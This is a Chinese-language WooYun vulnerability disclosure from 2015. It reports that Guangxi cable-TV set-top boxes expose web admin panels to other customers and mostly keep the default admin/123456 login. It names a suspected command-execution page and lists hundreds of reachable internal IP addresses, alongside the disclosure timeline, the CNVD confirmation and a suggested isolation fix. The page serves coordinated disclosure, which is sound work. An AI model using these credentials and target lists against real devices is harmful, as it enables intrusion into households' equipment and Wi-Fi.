广西广电网络高清机顶盒WIFI版漏洞三之超过百万数量的机顶盒任意访问

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115728

漏洞标题：广西广电网络高清机顶盒WIFI版漏洞三之超过百万数量的机顶盒任意访问

漏洞作者： wefgod

提交时间：2015-05-24 13:27

修复时间：2015-08-26 18:38

公开时间：2015-08-26 18:38

漏洞类型：设计不当

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-24：细节已通知厂商并且等待厂商处理中
2015-05-28：厂商已经确认，细节仅向厂商公开
2015-05-31：细节向第三方安全合作伙伴开放
2015-07-22：细节向核心白帽子及相关领域专家公开
2015-08-01：细节向普通白帽子公开
2015-08-11：细节向实习白帽子公开
2015-08-26：细节向公众公开

简要描述：

截至2013 年12 月31 日，广西公司有线电视用户数达491.81 万户，其中数字电视用户376.81 万户（高清电视用户82.57 万户，互动电视用户22.93万户），模拟电视用户115.00 万户。
不知道到15年具体有多少用户，粗看这个数据，现在能用上高清机顶盒的绝对不会低于100万，而且只要是开机状态且接上了广西广电的同轴电缆的有上网功能的机顶盒，全部都可以访问！
前面两个漏洞在本次测试中可能会用到：
http://wooyun.org/bugs/wooyun-2015-0115655
http://wooyun.org/bugs/wooyun-2015-0115665

详细说明：

不管啥漏洞，你想要利用总要有前提
1.你家有具有上网功能的机顶盒（本次以高清机顶盒为例）
2.你家网络没有被广电以欠费之类的理由停用
3.你家用的是广西广电网络（因为其他地方不一定可以）
4.无论是否开通上网功能，都不受影响，开通或不开通均可以访问别人家的机顶盒
5.你还是要有一台正常的电脑。
6.记住默认口令是最简单的admin/123456
本次漏洞仅讨论和机顶盒相关的网段。
回到正题，虽然看起来广电是做有一些所谓的安全策略，但是80端口隔离还是不严格（目前机顶盒网段仅发现80端口可大规模利用），可以访问别人家机顶盒的web界面；同时，绝大部分用户都没有修改web界面的登录密码……默认admin/123456，其他，大家懂的呵呵呵呵。
目前我所用的段是从10.185.128.1开始的，子网掩码是255.255.192.0，目前测试到10.185.184段还有机器

以下是部分web界面访问的截图：

访问web界面可以做点啥？
可以恢复出厂设置：

可以重启：

可以固件升级（改个固件留个后门？？？？）

猥琐点的屏蔽端口之类的？

咱们telnet不了其他机顶盒，咱们用疑似后门的页面，执行下命令总ok吧？

最后，再给个例子，谁家的wifi密码？不仅可以蹭，还可以改，呵呵呵呵

漏洞证明：

再稍微扩展一下，根据收集到的信息，还有很多其他网段有机顶盒，按目前发现的基本全广西所有机顶盒的80端口都可以访问！
比如灵山县段IP：
http://10.84.16.8/syscmd.asp

http://10.84.16.188/home.asp
还有其他类型的设备？

灵山县还有部分可以访问的80端口：
10.84.16.8:80
10.84.16.17:80
10.84.16.15:80
10.84.16.19:80
10.84.16.32:80
10.84.16.31:80
10.84.16.21:80
10.84.16.62:80
10.84.16.64:80
10.84.16.75:80
10.84.16.58:80
10.84.16.80:80
10.84.16.103:80
10.84.16.108:80
10.84.16.121:80
10.84.16.148:80
10.84.16.147:80
10.84.16.146:80
10.84.16.188:80
10.84.16.208:80
10.84.16.216:80
10.84.16.221:80
10.84.16.229:80
10.84.16.240:80
10.84.17.5:80
10.84.17.19:80
10.84.17.16:80
10.84.17.33:80
10.84.17.68:80
10.84.17.70:80
10.84.17.85:80
10.84.17.102:80
10.84.17.106:80
10.84.17.101:80
10.84.17.105:80
10.84.17.107:80
10.84.17.109:80
10.84.17.110:80
10.84.17.112:80
10.84.17.113:80

横县网段：
http://10.59.16.9/homepc.asp

部分可访问的80端口
10.59.16.9:80
10.59.16.17:80
10.59.16.30:80
10.59.16.2:80
10.59.16.47:80
10.59.16.56:80
10.59.16.64:80
10.59.16.63:80
10.59.16.80:80
10.59.16.78:80
10.59.16.115:80
10.59.16.131:80
10.59.16.146:80
10.59.16.145:80
10.59.16.163:80
10.59.16.171:80
10.59.16.193:80
10.59.16.190:80
10.59.16.213:80
10.59.16.205:80
10.59.16.227:80
10.59.16.229:80
10.59.17.13:80
10.59.17.10:80
10.59.17.21:80
10.59.17.90:80
10.59.17.112:80
10.59.17.114:80
10.59.17.115:80
10.59.17.140:80
10.59.17.156:80
10.59.17.165:80
10.59.17.193:80
10.59.17.187:80
10.59.17.198:80
10.59.17.184:80
10.59.17.196:80
10.59.17.208:80
10.59.17.215:80
10.59.17.229:80
10.59.17.233:80
10.59.17.250:80
10.59.18.4:80
10.59.18.21:80
10.59.18.56:80

北海网段
http://10.194.133.4/homepc.asp

部分可访问的IP：
10.194.133.2:80
10.194.133.4:80
10.194.133.12:80
10.194.133.15:80
10.194.133.21:80
10.194.133.10:80
10.194.133.24:80
10.194.133.8:80
10.194.133.23:80
10.194.133.31:80
10.194.133.7:80
10.194.133.13:80
10.194.133.19:80
10.194.133.17:80
10.194.133.11:80
10.194.133.32:80
10.194.133.36:80
10.194.133.22:80
10.194.133.45:80
10.194.133.39:80
10.194.133.43:80
10.194.133.35:80
10.194.133.34:80
10.194.133.48:80
10.194.133.41:80
10.194.133.42:80
10.194.133.47:80
10.194.133.29:80
10.194.133.66:80
10.194.133.63:80
10.194.133.77:80
10.194.133.73:80
10.194.133.55:80
10.194.133.83:80
10.194.133.82:80
10.194.133.70:80
10.194.133.78:80
10.194.133.69:80
10.194.133.76:80
10.194.133.88:80
10.194.133.75:80
10.194.133.87:80
10.194.133.86:80
10.194.133.95:80
10.194.133.71:80
10.194.133.91:80
10.194.133.96:80
10.194.133.98:80
10.194.133.64:80
10.194.133.103:80
10.194.133.104:80
10.194.133.106:80
10.194.133.105:80
10.194.133.115:80
10.194.133.121:80
10.194.133.117:80
10.194.133.124:80
10.194.133.123:80
10.194.133.119:80
10.194.133.120:80
10.194.133.134:80
10.194.133.135:80
10.194.133.131:80
10.194.133.137:80
10.194.133.136:80
10.194.133.139:80
10.194.133.128:80
10.194.133.138:80
10.194.133.142:80
10.194.133.146:80
10.194.133.148:80
10.194.133.149:80
10.194.133.152:80
10.194.133.155:80
10.194.133.154:80
10.194.133.161:80
10.194.133.164:80
10.194.133.162:80
10.194.133.167:80
10.194.133.169:80
10.194.133.125:80
10.194.133.173:80
10.194.133.176:80
10.194.133.174:80
10.194.133.179:80
10.194.133.181:80
10.194.133.182:80
10.194.133.127:80
10.194.133.133:80
10.194.133.140:80
10.194.133.145:80
10.194.133.185:80
10.194.133.186:80
10.194.133.189:80
10.194.133.191:80
10.194.133.187:80
10.194.133.195:80
10.194.133.199:80
10.194.133.196:80
10.194.133.204:80
10.194.133.203:80
10.194.133.205:80
10.194.133.201:80
10.194.133.217:80
10.194.133.216:80
10.194.133.210:80
10.194.133.221:80
10.194.133.211:80
10.194.133.209:80
10.194.133.219:80
10.194.133.227:80
10.194.133.214:80
10.194.133.224:80
10.194.133.222:80
10.194.133.231:80
10.194.133.228:80
10.194.133.229:80
10.194.133.232:80
10.194.133.233:80
10.194.133.237:80
10.194.133.240:80
10.194.133.238:80
10.194.133.245:80
10.194.133.251:80
10.194.133.247:80
10.194.133.252:80

首府南宁网段：
http://10.4.133.6/homepc.asp

部分可访问80端口的IP
10.4.133.6:80
10.4.133.2:80
10.4.133.18:80
10.4.133.22:80
10.4.133.17:80
10.4.133.19:80
10.4.133.11:80
10.4.133.20:80
10.4.133.27:80
10.4.133.26:80
10.4.133.24:80
10.4.133.41:80
10.4.133.44:80
10.4.133.38:80
10.4.133.39:80
10.4.133.53:80
10.4.133.59:80
10.4.133.56:80
10.4.133.63:80
10.4.133.70:80
10.4.133.78:80
10.4.133.77:80
10.4.133.82:80
10.4.133.83:80
10.4.133.93:80
10.4.133.99:80
10.4.133.101:80
10.4.133.103:80
10.4.133.113:80
10.4.133.106:80
10.4.133.111:80
10.4.133.116:80
10.4.133.118:80
10.4.133.52:80
10.4.133.54:80
10.4.133.57:80
10.4.133.55:80
10.4.133.61:80
10.4.133.60:80
10.4.133.62:80
10.4.133.65:80
10.4.133.87:80
10.4.133.84:80
10.4.133.86:80
10.4.133.71:80
10.4.133.96:80
10.4.133.81:80
10.4.133.92:80
10.4.133.121:80
10.4.133.123:80
10.4.133.125:80
10.4.133.124:80
10.4.133.128:80
10.4.133.131:80
10.4.133.135:80
10.4.133.141:80
10.4.133.142:80
10.4.133.144:80
10.4.133.145:80
10.4.133.148:80
10.4.133.151:80
10.4.133.152:80
10.4.133.155:80
10.4.133.156:80
10.4.133.160:80
10.4.133.164:80
10.4.133.167:80
10.4.133.171:80
10.4.133.168:80
10.4.133.178:80
10.4.133.172:80
10.4.133.173:80
10.4.133.183:80
10.4.133.184:80
10.4.133.194:80
10.4.133.193:80
10.4.133.196:80
10.4.133.197:80
10.4.133.189:80
10.4.133.199:80
10.4.133.206:80
10.4.133.204:80
10.4.133.205:80
10.4.133.209:80
10.4.133.210:80
10.4.133.214:80
10.4.133.224:80
10.4.133.221:80
10.4.133.226:80
10.4.133.222:80
10.4.133.232:80
10.4.133.234:80
10.4.133.240:80
10.4.133.243:80
10.4.133.245:80
10.4.133.244:80
10.4.133.249:80
10.4.133.251:80
10.4.134.5:80
10.4.133.186:80
10.4.133.185:80
10.4.134.12:80
10.4.134.16:80
10.4.134.20:80
10.4.134.23:80
10.4.134.26:80
10.4.134.28:80
10.4.134.31:80
10.4.134.34:80
10.4.134.35:80
10.4.134.37:80
10.4.134.36:80
10.4.134.39:80
10.4.134.3:80
10.4.134.42:80
10.4.134.45:80
10.4.134.46:80
10.4.134.50:80
10.4.134.54:80
10.4.134.56:80
10.4.134.60:80
10.4.134.58:80
10.4.134.61:80
10.4.134.57:80
10.4.134.63:80
10.4.134.67:80
10.4.134.66:80
10.4.134.71:80
10.4.134.65:80
10.4.134.72:80
10.4.134.73:80
10.4.134.79:80
10.4.134.86:80
10.4.134.87:80
10.4.134.90:80
10.4.134.92:80
10.4.134.101:80
10.4.134.100:80
10.4.134.104:80
10.4.134.109:80
10.4.134.115:80
10.4.134.117:80
10.4.134.122:80
10.4.134.119:80
10.4.134.121:80
10.4.134.123:80
10.4.134.125:80
10.4.134.127:80
10.4.134.130:80
10.4.134.132:80
10.4.134.133:80
10.4.134.137:80
10.4.134.140:80
10.4.134.142:80
10.4.134.143:80
10.4.134.145:80
10.4.134.152:80
10.4.134.158:80
10.4.134.157:80
10.4.134.159:80
10.4.134.165:80
10.4.134.168:80
10.4.134.172:80
10.4.134.173:80
10.4.134.178:80
10.4.134.179:80
10.4.134.182:80
10.4.134.181:80
10.4.134.184:80
10.4.134.185:80
10.4.134.186:80
10.4.134.187:80
10.4.134.190:80
10.4.134.203:80
10.4.134.206:80
10.4.134.207:80
10.4.134.211:80
10.4.134.214:80
10.4.134.216:80
10.4.134.217:80
10.4.134.219:80
10.4.134.222:80
10.4.134.220:80
10.4.134.226:80
10.4.134.224:80
10.4.134.225:80
10.4.134.233:80
10.4.134.236:80
10.4.134.239:80
10.4.134.242:80
10.4.134.245:80
10.4.134.246:80
10.4.134.252:80

最后再测一个来宾的，其他的都可以访问的，一个A段太大了，不再继续深入
http://10.241.131.7/homepc.asp

10.241.131.7:80
10.241.131.8:80
10.241.131.3:80
10.241.131.11:80
10.241.131.10:80
10.241.131.12:80
10.241.131.19:80
10.241.131.14:80
10.241.131.18:80
10.241.131.22:80
10.241.131.15:80
10.241.131.25:80
10.241.131.21:80
10.241.131.23:80
10.241.131.30:80
10.241.131.26:80
10.241.131.31:80
10.241.131.36:80
10.241.131.35:80
10.241.131.32:80
10.241.131.27:80
10.241.131.39:80
10.241.131.43:80
10.241.131.42:80
10.241.131.45:80
10.241.131.46:80
10.241.131.48:80
10.241.131.44:80
10.241.131.49:80
10.241.131.51:80
10.241.131.50:80
10.241.131.53:80
10.241.131.56:80
10.241.131.72:80
10.241.131.69:80
10.241.131.67:80
10.241.131.68:80
10.241.131.79:80
10.241.131.81:80
10.241.131.83:80
10.241.131.77:80
10.241.131.55:80
10.241.131.84:80
10.241.131.86:80
10.241.131.76:80
10.241.131.90:80
10.241.131.95:80
10.241.131.88:80
10.241.131.97:80
10.241.131.99:80
10.241.131.96:80
10.241.131.52:80
10.241.131.101:80
10.241.131.104:80
10.241.131.102:80
10.241.131.110:80
10.241.131.105:80
10.241.131.113:80
10.241.131.112:80
10.241.131.108:80
10.241.131.114:80
10.241.131.122:80
10.241.131.121:80
10.241.131.119:80
10.241.131.124:80
10.241.131.128:80
10.241.131.127:80
10.241.131.136:80
10.241.131.130:80
10.241.131.138:80
10.241.131.144:80
10.241.131.140:80
10.241.131.146:80
10.241.131.141:80
10.241.131.151:80
10.241.131.139:80
10.241.131.150:80
10.241.131.163:80
10.241.131.165:80
10.241.131.156:80
10.241.131.160:80
10.241.131.161:80
10.241.131.172:80
10.241.131.166:80
10.241.131.177:80
10.241.131.179:80
10.241.131.181:80
10.241.131.183:80
10.241.131.185:80
10.241.131.186:80
10.241.131.188:80
10.241.131.187:80
10.241.131.189:80
10.241.131.190:80
10.241.131.192:80
10.241.131.194:80
10.241.131.196:80
10.241.131.198:80
10.241.131.208:80
10.241.131.205:80
10.241.131.210:80
10.241.131.211:80
10.241.131.213:80
10.241.131.202:80
10.241.131.218:80
10.241.131.215:80
10.241.131.222:80
10.241.131.225:80
10.241.131.224:80
10.241.131.223:80
10.241.131.226:80
10.241.131.232:80
10.241.131.235:80
10.241.131.236:80
10.241.131.239:80
10.241.131.240:80
10.241.131.243:80
10.241.131.238:80
10.241.131.245:80
10.241.131.248:80
10.241.131.252:80
10.241.132.4:80
10.241.131.253:80
10.241.132.8:80
10.241.132.2:80
10.241.132.3:80
10.241.132.9:80
10.241.132.11:80
10.241.132.6:80
10.241.132.16:80
10.241.132.20:80
10.241.132.23:80
10.241.132.25:80
10.241.132.29:80
10.241.132.28:80
10.241.132.30:80
10.241.132.33:80
10.241.132.35:80
10.241.132.34:80
10.241.132.39:80
10.241.132.38:80
10.241.132.40:80
10.241.132.43:80
10.241.132.44:80
10.241.132.48:80
10.241.132.53:80
10.241.132.54:80
10.241.132.55:80
10.241.132.59:80
10.241.132.62:80
10.241.132.60:80
10.241.132.63:80
10.241.132.64:80
10.241.132.61:80
10.241.132.66:80
10.241.132.69:80
10.241.132.71:80
10.241.132.72:80
10.241.132.75:80
10.241.132.78:80
10.241.132.81:80
10.241.132.86:80
10.241.132.90:80
10.241.132.88:80
10.241.132.92:80
10.241.132.94:80
10.241.132.96:80
10.241.132.97:80
10.241.132.99:80
10.241.132.103:80
10.241.132.108:80
10.241.132.111:80
10.241.132.113:80
10.241.132.116:80
10.241.132.117:80
10.241.132.120:80
10.241.132.121:80
10.241.132.124:80
10.241.132.125:80
10.241.132.131:80
10.241.132.134:80
10.241.132.135:80
10.241.132.138:80
10.241.132.139:80
10.241.132.136:80
10.241.132.140:80
10.241.132.133:80
10.241.132.141:80
10.241.132.144:80
10.241.132.145:80
10.241.132.147:80
10.241.132.143:80
10.241.132.151:80
10.241.132.152:80
10.241.132.158:80
10.241.132.159:80
10.241.132.164:80
10.241.132.165:80
10.241.132.168:80
10.241.132.170:80
10.241.132.172:80
10.241.132.171:80
10.241.132.175:80
10.241.132.176:80
10.241.132.178:80
10.241.132.181:80
10.241.132.180:80
10.241.132.182:80
10.241.132.183:80
10.241.132.185:80
10.241.132.186:80
10.241.132.187:80
10.241.132.189:80
10.241.132.191:80
10.241.132.196:80
10.241.132.198:80
10.241.132.203:80
10.241.132.205:80
10.241.132.204:80
10.241.132.210:80
10.241.132.209:80

修复方案：

做好网络隔离，机顶盒的网段禁止互相访问80端口

版权声明：转载请注明来源 wefgod@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-05-28 18:36

厂商回复：

CNVD确认所述情况，已经转由CNCERT下发给广西分中心，由其后续协调网站管理单位处置。

漏洞评价：

2015-05-24 19:45 | GrayTrack ( 实习白帽子 | Rank:75 漏洞数:14 | 灰色轨迹)

屌炸天
2015-05-24 22:20 | sco4x0 ( 实习白帽子 | Rank:31 漏洞数:13 | O_o)

逮着一只羊薅羊毛会出事啊
2015-05-29 06:36 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

星期天我也去开通宽带业务去
2015-05-30 15:29 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

@scanf 我没开
2015-08-26 19:32 | ddbug ( 路人 | Rank:18 漏洞数:9 )

@wefgod 如此说来，你是广西人。。。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115728

漏洞标题：广西广电网络高清机顶盒WIFI版漏洞三之超过百万数量的机顶盒任意访问

相关厂商：cncert国家互联网应急中心

漏洞作者： wefgod

提交时间：2015-05-24 13:27

修复时间：2015-08-26 18:38

公开时间：2015-08-26 18:38

漏洞类型：设计不当

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 wefgod@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115728

漏洞标题：广西广电网络高清机顶盒WIFI版漏洞三之超过百万数量的机顶盒任意访问

相关厂商：cncert国家互联网应急中心

漏洞作者： wefgod

提交时间：2015-05-24 13:27

修复时间：2015-08-26 18:38

公开时间：2015-08-26 18:38

漏洞类型：设计不当

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0115728"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 wefgod@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：